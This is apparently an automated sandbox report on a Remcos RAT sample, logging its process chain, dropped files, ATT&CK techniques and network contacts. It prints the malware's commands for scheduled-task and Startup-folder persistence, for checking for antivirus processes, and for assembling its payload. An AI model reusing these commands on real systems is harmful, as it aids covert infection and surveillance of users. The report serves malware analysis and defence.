    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: sXpIsdpkzy.exeStatic file information: File size 1304754 > 1048576
    Source: sXpIsdpkzy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: sXpIsdpkzy.exeStatic PE information: real checksum: 0x143b45 should be: 0x1435f8
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB8B75 push ecx; ret 19_2_00FB8B88

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\33988\Paintball.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comFile created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\33988\Paintball.comJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comFile created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.urlJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.urlJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_010159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_010159B3
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FA5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00FA5EDA
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_00FB33B7
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrAPI coverage: 4.9 %
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00FF4005
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00FFC2FF
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_00FF494A
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00FFCD9F
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFCD14 FindFirstFileW,FindClose,19_2_00FFCD14
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00FFF5D8
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00FFF735
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00FFFA36
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00FF3CE2
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FA5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_00FA5D13
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\33988\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\33988Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_010045D5 BlockInput,19_2_010045D5
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00FA5240
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_00FC5CAC
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00FE88CD
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00FBA385
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBA354 SetUnhandledExceptionFilter,19_2_00FBA354
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE9369 LogonUserW,19_2_00FE9369
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00FA5240
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF1AC6 SendInput,keybd_event,19_2_00FF1AC6
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF51E2 mouse_event,19_2_00FF51E2
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 33988Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral wJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\33988\Paintball.com Paintball.com wJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securify360.url" & echo url="c:\users\user\appdata\local\secure360 innovations\securify360.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securify360.url" & exit
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securify360.url" & echo url="c:\users\user\appdata\local\secure360 innovations\securify360.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\securify360.url" & exitJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00FE88CD
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00FF4F1C
    Source: Paintball.com, 0000000B.00000000.1326719432.00000000009B6000.00000002.00000001.01000000.00000007.sdmp, Paintball.com, 0000000B.00000003.1336860010.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, Securify360.scr, 00000013.00000000.1361085844.0000000001046000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: registros.dat.11.drBinary or memory string: [2024/12/12 11:40:48 Program Manager]
    Source: Securify360.scrBinary or memory string: Shell_TrayWnd
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB885B cpuid 19_2_00FB885B
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FD0030 GetLocalTime,__swprintf,19_2_00FD0030
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FD0722 GetUserNameW,19_2_00FD0722
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00FC416A
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
    Source: Securify360.scrBinary or memory string: WIN_81
    Source: Securify360.scrBinary or memory string: WIN_XP
    Source: Securify360.scrBinary or memory string: WIN_XPe
    Source: Securify360.scrBinary or memory string: WIN_VISTA
    Source: Securify360.scrBinary or memory string: WIN_7
    Source: Securify360.scrBinary or memory string: WIN_8
    Source: Paintball.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_0100696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,19_2_0100696E
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_01006E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_01006E32
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information11
    Scripting
    2
    Valid Accounts
    1
    Windows Management Instrumentation
    11
    Scripting
    1
    Exploitation for Privilege Escalation
    1
    Disable or Modify Tools
    121
    Input Capture
    2
    System Time Discovery
    Remote Services1
    Archive Collected Data
    2
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Account Discovery
    Remote Desktop Protocol121
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    2
    Valid Accounts
    2
    Valid Accounts
    2
    Obfuscated Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    21
    Access Token Manipulation
    1
    DLL Side-Loading
    NTDS17
    System Information Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd2
    Registry Run Keys / Startup Folder
    12
    Process Injection
    111
    Masquerading
    LSA Secrets3
    Security Software Discovery
    SSHKeylogging2
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Scheduled Task/Job
    2
    Valid Accounts
    Cached Domain Credentials4
    Process Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
    Registry Run Keys / Startup Folder
    21
    Access Token Manipulation
    DCSync1
    Application Window Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
    Process Injection
    Proc Filesystem1
    System Owner/User Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573901 Sample: sXpIsdpkzy.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 57 OFfdlkbKbwMNYjhkX.OFfdlkbKbwMNYjhkX 2->57 59 3diciembre.con-ip.com 2->59 61 geoplugin.net 2->61 71 Suricata IDS alerts for network traffic 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Yara detected Remcos RAT 2->75 77 7 other signatures 2->77 10 sXpIsdpkzy.exe 29 2->10         started        12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 17 cmd.exe 3 10->17         started        83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->83 21 Securify360.scr 12->21         started        23 Securify360.scr 15->23         started        process6 file7 47 C:\Users\user\AppData\Local\...\Paintball.com, PE32 17->47 dropped 67 Drops PE files with a suspicious file extension 17->67 69 Uses schtasks.exe or at.exe to add and modify task schedules 17->69 25 Paintball.com 3 19 17->25         started        30 cmd.exe 2 17->30         started        32 conhost.exe 17->32         started        34 7 other processes 17->34 signatures8 process9 dnsIp10 63 3diciembre.con-ip.com 181.131.217.244, 1515, 49930 EPMTelecomunicacionesSAESPCO Colombia 25->63 65 geoplugin.net 178.237.33.50, 49944, 80 ATOM86-ASATOM86NL Netherlands 25->65 51 C:\Users\user\AppData\...\Securify360.scr, PE32 25->51 